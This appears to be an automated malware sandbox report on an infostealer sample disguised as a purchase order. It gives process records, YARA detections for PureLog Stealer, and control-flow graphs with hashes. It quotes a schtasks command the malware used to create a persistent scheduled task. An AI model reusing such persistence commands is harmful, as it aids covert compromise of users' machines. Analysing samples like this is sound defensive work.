                                                      Target ID:4
                                                      Start time:17:28:57
                                                      Start date:14/03/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp
                                                      Imagebase:0x570000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:17:28:57
                                                      Start date:14/03/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:17:28:59
                                                      Start date:14/03/2024
                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x7ff693ab0000
                                                      File size:496'640 bytes
                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:17:28:59
                                                      Start date:14/03/2024
                                                      Path:C:\Users\user\AppData\Roaming\FNOqSQ.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\FNOqSQ.exe
                                                      Imagebase:0x5d0000
                                                      File size:666'112 bytes
                                                      MD5 hash:876BDD759D990110A2BBD617B0F2C549
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.1690016809.00000000052B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.1687399793.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 66%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:9.4%
                                                        Dynamic/Decrypted Code Coverage:93.4%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:61
                                                        Total number of Limit Nodes:1
                                                        execution_graph 44975 24c4668 44976 24c467a 44975->44976 44977 24c4686 44976->44977 44979 24c4778 44976->44979 44980 24c479d 44979->44980 44984 24c4878 44980->44984 44988 24c4888 44980->44988 44986 24c48af 44984->44986 44985 24c498c 44985->44985 44986->44985 44992 24c449c 44986->44992 44989 24c48af 44988->44989 44990 24c498c 44989->44990 44991 24c449c CreateActCtxA 44989->44991 44991->44990 44993 24c5918 CreateActCtxA 44992->44993 44995 24c59db 44993->44995 44996 24cd0f8 44997 24cd13e 44996->44997 45001 24cd2c8 44997->45001 45004 24cd2d8 44997->45004 44998 24cd22b 45007 24cc9e0 45001->45007 45005 24cd306 45004->45005 45006 24cc9e0 DuplicateHandle 45004->45006 45005->44998 45006->45005 45008 24cd340 DuplicateHandle 45007->45008 45009 24cd306 45008->45009 45009->44998 45010 24cad78 45011 24cad87 45010->45011 45014 24cae60 45010->45014 45022 24cae70 45010->45022 45015 24cae81 45014->45015 45016 24caea4 45014->45016 45015->45016 45030 24cb0f8 45015->45030 45034 24cb108 45015->45034 45016->45011 45017 24cae9c 45017->45016 45018 24cb0a8 GetModuleHandleW 45017->45018 45019 24cb0d5 45018->45019 45019->45011 45023 24cae81 45022->45023 45024 24caea4 45022->45024 45023->45024 45028 24cb0f8 LoadLibraryExW 45023->45028 45029 24cb108 LoadLibraryExW 45023->45029 45024->45011 45025 24cae9c 45025->45024 45026 24cb0a8 GetModuleHandleW 45025->45026 45027 24cb0d5 45026->45027 45027->45011 45028->45025 45029->45025 45031 24cb11c 45030->45031 45032 24cb141 45031->45032 45038 24ca8b0 45031->45038 45032->45017 45035 24cb11c 45034->45035 45036 24ca8b0 LoadLibraryExW 45035->45036 45037 24cb141 45035->45037 45036->45037 45037->45017 45039 24cb2e8 LoadLibraryExW 45038->45039 45041 24cb361 45039->45041 45041->45032 45042 76d8317 45043 76d8322 45042->45043 45046 76d6c58 45043->45046 45045 76d8329 45048 76d6c6d 45046->45048 45047 76d6e82 45047->45045 45048->45047 45049 76d72a0 GlobalMemoryStatusEx 45048->45049 45049->45048 45050 76dc310 45051 76dc354 SetWindowsHookExA 45050->45051 45053 76dc39a 45051->45053

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 843 76d75ca-76d75d4 844 76d7556 843->844 845 76d75d6-76d75ea 843->845 848 76d755e-76d7588 844->848 846 76d75ec-76d762b call 76d7064 call 76d7034 845->846 847 76d764e-76d7655 845->847 864 76d762d-76d7638 846->864 865 76d7656-76d76bd 846->865 854 76d75a9 848->854 855 76d758a-76d75a7 848->855 857 76d75bb-76d75c2 854->857 855->857 868 76d763f-76d7646 864->868 875 76d76bf-76d76c1 865->875 876 76d76c6-76d76d6 865->876 868->847 877 76d7965-76d796c 875->877 878 76d76dd-76d76ed 876->878 879 76d76d8 876->879 881 76d794c-76d795a 878->881 882 76d76f3-76d7701 878->882 879->877 885 76d796d-76d79e6 881->885 886 76d795c-76d795e 881->886 882->885 887 76d7707 882->887 886->877 887->885 888 76d770e-76d7720 887->888 889 76d774b-76d776d 887->889 890 76d780a-76d7832 887->890 891 76d7725-76d7746 887->891 892 76d77e4-76d7805 887->892 893 76d7864-76d78a1 887->893 894 76d78a6-76d78cc 887->894 895 76d7940-76d794a 887->895 896 76d791c-76d793e 887->896 897 76d78ff-76d791a 887->897 898 76d77be-76d77df 887->898 899 76d7798-76d77b9 887->899 900 76d7837-76d785f 887->900 901 76d78d1-76d78fd 887->901 902 76d7772-76d7793 887->902 888->877 889->877 890->877 891->877 892->877 893->877 894->877 895->877 896->877 897->877 898->877 899->877 900->877 901->877 902->877
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4129666908.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_76d0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Xbq$|$$^q
                                                        • API String ID: 0-219893329
                                                        • Opcode ID: 85dc684a94b997dd773aac8fb1b7ff2f669682dfcf2e61afb05835454a281bc6
                                                        • Instruction ID: 9fa4cac98d3ccc4c2434ebffd6e91050d4976dc502d8a665a386307cbe13f421
                                                        • Opcode Fuzzy Hash: 85dc684a94b997dd773aac8fb1b7ff2f669682dfcf2e61afb05835454a281bc6
                                                        • Instruction Fuzzy Hash: CDC1D1B1B002149FDB18AB79985427E7BB3BFC9710F14856EE447EB394CE388D428792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1227 9d6c110-9d6c12d 1228 9d6c12f-9d6c132 1227->1228 1229 9d6c156-9d6c159 1228->1229 1230 9d6c134-9d6c151 1228->1230 1231 9d6c16c-9d6c16f 1229->1231 1232 9d6c15b-9d6c161 1229->1232 1230->1229 1231->1232 1235 9d6c171-9d6c174 1231->1235 1233 9d6c167 1232->1233 1234 9d6c2ac-9d6c2b6 1232->1234 1233->1231 1239 9d6c2bd-9d6c2bf 1234->1239 1237 9d6c176-9d6c17a 1235->1237 1238 9d6c185-9d6c188 1235->1238 1240 9d6c2d6-9d6c2e3 1237->1240 1241 9d6c180 1237->1241 1242 9d6c192-9d6c195 1238->1242 1243 9d6c18a-9d6c18d 1238->1243 1245 9d6c2c4-9d6c2c6 1239->1245 1241->1238 1246 9d6c197-9d6c19a 1242->1246 1247 9d6c1fb-9d6c201 1242->1247 1243->1242 1248 9d6c2cd-9d6c2d0 1245->1248 1249 9d6c2c8 1245->1249 1252 9d6c1a4-9d6c1a7 1246->1252 1253 9d6c19c-9d6c19f 1246->1253 1250 9d6c203 1247->1250 1251 9d6c23b-9d6c241 1247->1251 1248->1228 1248->1240 1249->1248 1256 9d6c208-9d6c20b 1250->1256 1254 9d6c247-9d6c24f 1251->1254 1255 9d6c2e4-9d6c313 1251->1255 1257 9d6c1bd-9d6c1c0 1252->1257 1258 9d6c1a9-9d6c1b8 1252->1258 1253->1252 1254->1255 1259 9d6c255-9d6c262 1254->1259 1279 9d6c31d-9d6c320 1255->1279 1260 9d6c20d-9d6c213 1256->1260 1261 9d6c21a-9d6c21d 1256->1261 1262 9d6c1c2-9d6c1cb 1257->1262 1263 9d6c1cc-9d6c1cf 1257->1263 1258->1257 1259->1255 1266 9d6c268-9d6c26c 1259->1266 1260->1253 1268 9d6c215 1260->1268 1269 9d6c225-9d6c228 1261->1269 1270 9d6c21f-9d6c220 1261->1270 1264 9d6c1d6-9d6c1d9 1263->1264 1265 9d6c1d1-9d6c1d3 1263->1265 1272 9d6c1f6-9d6c1f9 1264->1272 1273 9d6c1db-9d6c1f1 1264->1273 1265->1264 1274 9d6c271-9d6c274 1266->1274 1268->1261 1275 9d6c236-9d6c239 1269->1275 1276 9d6c22a-9d6c231 1269->1276 1270->1269 1272->1247 1272->1256 1273->1272 1277 9d6c276-9d6c28b 1274->1277 1278 9d6c290-9d6c293 1274->1278 1275->1251 1275->1274 1276->1275 1277->1278 1281 9d6c2a7-9d6c2aa 1278->1281 1282 9d6c295-9d6c2a2 1278->1282 1283 9d6c322-9d6c32c 1279->1283 1284 9d6c331-9d6c334 1279->1284 1281->1234 1281->1245 1282->1281 1283->1284 1286 9d6c356-9d6c359 1284->1286 1287 9d6c336-9d6c33a 1284->1287 1288 9d6c36d-9d6c370 1286->1288 1289 9d6c35b-9d6c362 1286->1289 1292 9d6c340-9d6c348 1287->1292 1293 9d6c40e-9d6c44c 1287->1293 1297 9d6c392-9d6c395 1288->1297 1298 9d6c372-9d6c376 1288->1298 1295 9d6c406-9d6c40d 1289->1295 1296 9d6c368 1289->1296 1292->1293 1294 9d6c34e-9d6c351 1292->1294 1306 9d6c44e-9d6c451 1293->1306 1294->1286 1296->1288 1300 9d6c397-9d6c39e 1297->1300 1301 9d6c39f-9d6c3a2 1297->1301 1298->1293 1299 9d6c37c-9d6c384 1298->1299 1299->1293 1303 9d6c38a-9d6c38d 1299->1303 1304 9d6c3a4-9d6c3b5 1301->1304 1305 9d6c3ba-9d6c3bd 1301->1305 1303->1297 1304->1305 1309 9d6c3d7-9d6c3da 1305->1309 1310 9d6c3bf-9d6c3c3 1305->1310 1307 9d6c457-9d6c5eb 1306->1307 1308 9d6c73a-9d6c73d 1306->1308 1376 9d6c724-9d6c737 1307->1376 1377 9d6c5f1-9d6c5f8 1307->1377 1314 9d6c73f-9d6c746 1308->1314 1315 9d6c74b-9d6c74e 1308->1315 1312 9d6c3f4-9d6c3f6 1309->1312 1313 9d6c3dc-9d6c3e0 1309->1313 1310->1293 1311 9d6c3c5-9d6c3cd 1310->1311 1311->1293 1318 9d6c3cf-9d6c3d2 1311->1318 1320 9d6c3fd-9d6c400 1312->1320 1321 9d6c3f8 1312->1321 1313->1293 1319 9d6c3e2-9d6c3ea 1313->1319 1314->1315 1322 9d6c750-9d6c761 1315->1322 1323 9d6c76c-9d6c76f 1315->1323 1318->1309 1319->1293 1325 9d6c3ec-9d6c3ef 1319->1325 1320->1279 1320->1295 1321->1320 1330 9d6c767 1322->1330 1331 9d6c80c-9d6c81f 1322->1331 1323->1307 1324 9d6c775-9d6c778 1323->1324 1327 9d6c792-9d6c795 1324->1327 1328 9d6c77a-9d6c78b 1324->1328 1325->1312 1332 9d6c797-9d6c79e 1327->1332 1333 9d6c7a3-9d6c7a6 1327->1333 1328->1332 1338 9d6c78d 1328->1338 1330->1323 1332->1333 1336 9d6c7c0-9d6c7c3 1333->1336 1337 9d6c7a8-9d6c7b9 1333->1337 1340 9d6c7c5-9d6c7d6 1336->1340 1341 9d6c7dd-9d6c7e0 1336->1341 1348 9d6c7ef-9d6c800 1337->1348 1349 9d6c7bb 1337->1349 1338->1327 1340->1332 1350 9d6c7d8 1340->1350 1342 9d6c7e2-9d6c7e7 1341->1342 1343 9d6c7ea-9d6c7ed 1341->1343 1342->1343 1347 9d6c807-9d6c80a 1343->1347 1343->1348 1347->1331 1352 9d6c822-9d6c825 1347->1352 1348->1332 1357 9d6c802 1348->1357 1349->1336 1350->1341 1352->1307 1354 9d6c82b-9d6c82d 1352->1354 1355 9d6c834-9d6c837 1354->1355 1356 9d6c82f 1354->1356 1355->1306 1359 9d6c83d-9d6c846 1355->1359 1356->1355 1357->1347 1378 9d6c5fe-9d6c621 1377->1378 1379 9d6c6ac-9d6c6b3 1377->1379 1388 9d6c629-9d6c631 1378->1388 1379->1376 1380 9d6c6b5-9d6c6e8 1379->1380 1392 9d6c6ed-9d6c71a 1380->1392 1393 9d6c6ea 1380->1393 1389 9d6c636-9d6c677 1388->1389 1390 9d6c633 1388->1390 1401 9d6c68f-9d6c6a0 1389->1401 1402 9d6c679-9d6c68a 1389->1402 1390->1389 1392->1359 1393->1392 1401->1359 1402->1359
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $
                                                        • API String ID: 0-3993045852
                                                        • Opcode ID: 9d99a9d450528fab0e1f76ae9cd2850c4946b903a225f50abdc0300646792d16
                                                        • Instruction ID: f11ee05acaaa93ad771b2cba1a1a28d432cf2b5f76a54f148a20ae0582ea8391
                                                        • Opcode Fuzzy Hash: 9d99a9d450528fab0e1f76ae9cd2850c4946b903a225f50abdc0300646792d16
                                                        • Instruction Fuzzy Hash: 7922C035E402048FDB24DFB4C4916AEBBB2EF89310F208469E989EB764D735DD46CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4129666908.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_76d0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5b00ca4fd426c13fd037750860486048963ddfddde70c18edc97b773f00f09c4
                                                        • Instruction ID: 3a174076a0676131c2a2a22f187e71da4d7708a03b5d480dde02e1ac90de9913
                                                        • Opcode Fuzzy Hash: 5b00ca4fd426c13fd037750860486048963ddfddde70c18edc97b773f00f09c4
                                                        • Instruction Fuzzy Hash: 082263B0E1020A8FDF24CA7DD5A07AEB7A6FB89314F148825E446EB395CB35DC85CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4129666908.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_76d0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6a74a021e3eaf67f45b2ad8e4ce91b82ff747c6d45d7753cc9cb53d3ea7aab3f
                                                        • Instruction ID: cf8e6ca69f48efa6294458742cf7118ddf642f25583cdbee0fb9f58ca3211930
                                                        • Opcode Fuzzy Hash: 6a74a021e3eaf67f45b2ad8e4ce91b82ff747c6d45d7753cc9cb53d3ea7aab3f
                                                        • Instruction Fuzzy Hash: DDD13DB0E10309CFDB15EFA9C848BADBBB1BF44304F158159D406AB3A5DB74AD49CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d00a6278bb4334016bf06430ec91d61837b602d0bb65b0a56cf97f18a9ef2c15
                                                        • Instruction ID: 4cfb2b23dd2d7a674c2555bea19a555db497041db9c6e0973bfa3100a5d0c46d
                                                        • Opcode Fuzzy Hash: d00a6278bb4334016bf06430ec91d61837b602d0bb65b0a56cf97f18a9ef2c15
                                                        • Instruction Fuzzy Hash: 5BB15EB0E0020ACFDB55DFA9C88579DBBF2BF88704F148129E815AB394EB749849CF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc391859a8d9dfb37ef2e332b509eb14e17852cfe2e2e8b761660795df19bd4d
                                                        • Instruction ID: bf82b0ac0cb8ad918fe4ff6ba4f039f90e6fd4d933a9678861b4e68430ce2906
                                                        • Opcode Fuzzy Hash: bc391859a8d9dfb37ef2e332b509eb14e17852cfe2e2e8b761660795df19bd4d
                                                        • Instruction Fuzzy Hash: 4EB160B0E0020ACFDF55EFA9D89179DBBF6AF88314F148129D815E7294EB749846CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2db184f1c7ff29a722e86e4fd69486663405e5d2f1214076a58b5bb6f2a71236
                                                        • Instruction ID: af718d130eb645107a6ee8cb7dfe3a6e44a8dfd6adc9e8c984b5ce4eb9f2fe86
                                                        • Opcode Fuzzy Hash: 2db184f1c7ff29a722e86e4fd69486663405e5d2f1214076a58b5bb6f2a71236
                                                        • Instruction Fuzzy Hash: 41917EB4E00209DFDF55DFA9C99179DBBF2AF88314F248129E419E7294EB349849CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 15e597975200e02e492bcd381fd1e2183e55afad4d8539430f2a1814ac1be867
                                                        • Instruction ID: 102b580c0459f6b637971da4736e044f33eca7d4c78283ba63db940c36ba084a
                                                        • Opcode Fuzzy Hash: 15e597975200e02e492bcd381fd1e2183e55afad4d8539430f2a1814ac1be867
                                                        • Instruction Fuzzy Hash: A82116B0D046188BEB5DDF9BD8547EEBAF6BFC9300F14C06AD409B6298EB7409458F60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a937a7ae3a297c5eb42c8f4dd5ce19b08db58d9f5c4d71dd87ffa5f46f77cceb
                                                        • Instruction ID: 42be5d8967c082d3efc0308b1fca6549e1df1f89bd48bd0820a86c33105c0a73
                                                        • Opcode Fuzzy Hash: a937a7ae3a297c5eb42c8f4dd5ce19b08db58d9f5c4d71dd87ffa5f46f77cceb
                                                        • Instruction Fuzzy Hash: 2A21D5B0D046188BEB5DDF9BD9547EEBAF6BFC9300F14C02AD40966298DB7409458FA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1405 24cae70-24cae7f 1406 24caeab-24caeaf 1405->1406 1407 24cae81-24cae8e call 24c9878 1405->1407 1408 24caeb1-24caebb 1406->1408 1409 24caec3-24caf04 1406->1409 1414 24caea4 1407->1414 1415 24cae90 1407->1415 1408->1409 1416 24caf06-24caf0e 1409->1416 1417 24caf11-24caf1f 1409->1417 1414->1406 1460 24cae96 call 24cb0f8 1415->1460 1461 24cae96 call 24cb108 1415->1461 1416->1417 1419 24caf21-24caf26 1417->1419 1420 24caf43-24caf45 1417->1420 1418 24cae9c-24cae9e 1418->1414 1421 24cafe0-24cb0a0 1418->1421 1423 24caf28-24caf2f call 24ca854 1419->1423 1424 24caf31 1419->1424 1422 24caf48-24caf4f 1420->1422 1455 24cb0a8-24cb0d3 GetModuleHandleW 1421->1455 1456 24cb0a2-24cb0a5 1421->1456 1425 24caf5c-24caf63 1422->1425 1426 24caf51-24caf59 1422->1426 1427 24caf33-24caf41 1423->1427 1424->1427 1430 24caf65-24caf6d 1425->1430 1431 24caf70-24caf79 call 24ca864 1425->1431 1426->1425 1427->1422 1430->1431 1436 24caf7b-24caf83 1431->1436 1437 24caf86-24caf8b 1431->1437 1436->1437 1439 24caf8d-24caf94 1437->1439 1440 24cafa9-24cafad 1437->1440 1439->1440 1441 24caf96-24cafa6 call 24ca874 call 24ca884 1439->1441 1443 24cafb3-24cafb6 1440->1443 1441->1440 1445 24cafb8-24cafd6 1443->1445 1446 24cafd9-24cafdf 1443->1446 1445->1446 1457 24cb0dc-24cb0f0 1455->1457 1458 24cb0d5-24cb0db 1455->1458 1456->1455 1458->1457 1460->1418 1461->1418
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 024CB0C6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120972982.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24c0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 7cb7538091625768bdcf773f42a9d1b03cd90492dc4b373c3bf81cecea9569e7
                                                        • Instruction ID: 95003ab4cd0039dd48e9fd2c4734dd0d89a620e2118a769d868afeb3eaceab9b
                                                        • Opcode Fuzzy Hash: 7cb7538091625768bdcf773f42a9d1b03cd90492dc4b373c3bf81cecea9569e7
                                                        • Instruction Fuzzy Hash: A67122B4A00B198FDB64DF2AC14079ABBF1FF88304F10892EE486D7A50D775E949CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1462 76d7a60-76d7a7b 1463 76d7a7d-76d7a8b 1462->1463 1464 76d7aa5-76d7ac4 call 76d7080 1462->1464 1465 76d7a90-76d7aa4 call 76d7074 1463->1465 1471 76d7aca-76d7b0c 1464->1471 1472 76d7ac6-76d7ac9 1464->1472 1471->1465 1477 76d7b0e-76d7b29 1471->1477 1480 76d7b2f-76d7bbc GlobalMemoryStatusEx 1477->1480 1481 76d7b2b-76d7b2e 1477->1481 1484 76d7bbe-76d7bc4 1480->1484 1485 76d7bc5-76d7bed 1480->1485 1484->1485
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4129666908.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_76d0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8f22484b6183aa039b8f4b4c2bd6eeab72e9e3e280e10e8122cb3b6f37f85ed9
                                                        • Instruction ID: 9c61ff3577d5b075d8611a4cc34283a818a4bbab1e9fc45928ab906013816b7b
                                                        • Opcode Fuzzy Hash: 8f22484b6183aa039b8f4b4c2bd6eeab72e9e3e280e10e8122cb3b6f37f85ed9
                                                        • Instruction Fuzzy Hash: E8413671D047968FCB05DF79C8142AEBFB0AF8A310F0886AAD485E7691DB389945CBD1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1488 71859b8-71859df 1489 71859e8-71859ee 1488->1489 1490 71859e1-71859e6 1488->1490 1491 71859f1-71859f5 1489->1491 1490->1491 1492 71859fe-7185a04 1491->1492 1493 71859f7-71859fc 1491->1493 1494 7185a07-7185a0b 1492->1494 1493->1494 1495 7185a0d-7185a2a 1494->1495 1496 7185a2f-7185a33 1494->1496 1506 7185c4f-7185c58 1495->1506 1497 7185a35-7185a52 1496->1497 1498 7185a57-7185a62 1496->1498 1497->1506 1499 7185a6a-7185a70 1498->1499 1500 7185a64-7185a67 1498->1500 1503 7185c5b-7185efe 1499->1503 1504 7185a76-7185a86 1499->1504 1500->1499 1511 7185a88-7185aa6 1504->1511 1512 7185aab-7185ad0 1504->1512 1516 7185c0f-7185c12 1511->1516 1519 7185c18-7185c1d 1512->1519 1520 7185ad6-7185adf 1512->1520 1516->1519 1516->1520 1519->1503 1521 7185c1f-7185c22 1519->1521 1520->1503 1522 7185ae5-7185afd 1520->1522 1525 7185c24 1521->1525 1526 7185c26-7185c29 1521->1526 1530 7185b0f-7185b26 1522->1530 1531 7185aff-7185b04 1522->1531 1525->1506 1526->1503 1527 7185c2b-7185c4d 1526->1527 1527->1506 1537 7185b28 1530->1537 1538 7185b2e-7185b38 1530->1538 1531->1503 1533 7185b0a-7185b0d 1531->1533 1533->1530 1536 7185b3d-7185b42 1533->1536 1536->1503 1539 7185b48-7185b57 1536->1539 1537->1538 1538->1519 1545 7185b59 1539->1545 1546 7185b5f-7185b6f 1539->1546 1545->1546 1546->1503 1550 7185b75-7185b78 1546->1550 1550->1503 1552 7185b7e-7185b81 1550->1552 1553 7185bd2-7185be4 1552->1553 1554 7185b83-7185b87 1552->1554 1553->1516 1563 7185be6-7185bfb 1553->1563 1554->1503 1555 7185b8d-7185b93 1554->1555 1557 7185ba4-7185baa 1555->1557 1558 7185b95-7185b9b 1555->1558 1557->1503 1561 7185bb0-7185bbc 1557->1561 1558->1503 1560 7185ba1 1558->1560 1560->1557 1569 7185bc4-7185bd0 1561->1569 1567 7185bfd 1563->1567 1568 7185c03-7185c0d 1563->1568 1567->1568 1568->1519 1569->1553
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q
                                                        • API String ID: 0-1614139903
                                                        • Opcode ID: de7cefe0597f390f55ad200a2b6ffde3714978e1fa4e43f604cc9781499491dc
                                                        • Instruction ID: 80267a6a7c1a3e5ab72f0141f11ac4f4d52f3306739c9870c39e53c3a5a13851
                                                        • Opcode Fuzzy Hash: de7cefe0597f390f55ad200a2b6ffde3714978e1fa4e43f604cc9781499491dc
                                                        • Instruction Fuzzy Hash: A1E17D74A00209DFDB05EFB8C994AAEBBF7FB88300F118455E805A73A9CB359995CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1597 24c590c-24c59d9 CreateActCtxA 1599 24c59db-24c59e1 1597->1599 1600 24c59e2-24c5a3c 1597->1600 1599->1600 1607 24c5a3e-24c5a41 1600->1607 1608 24c5a4b-24c5a4f 1600->1608 1607->1608 1609 24c5a60 1608->1609 1610 24c5a51-24c5a5d 1608->1610 1612 24c5a61 1609->1612 1610->1609 1612->1612
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 024C59C9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120972982.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24c0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 850f800270b613de773b0109bd70acbee76fb423845abbc2a395142431b4f0c8
                                                        • Instruction ID: d3810f415a91058c03071ea51f1bb6ca4c39e055195a51d326c0b862e127034e
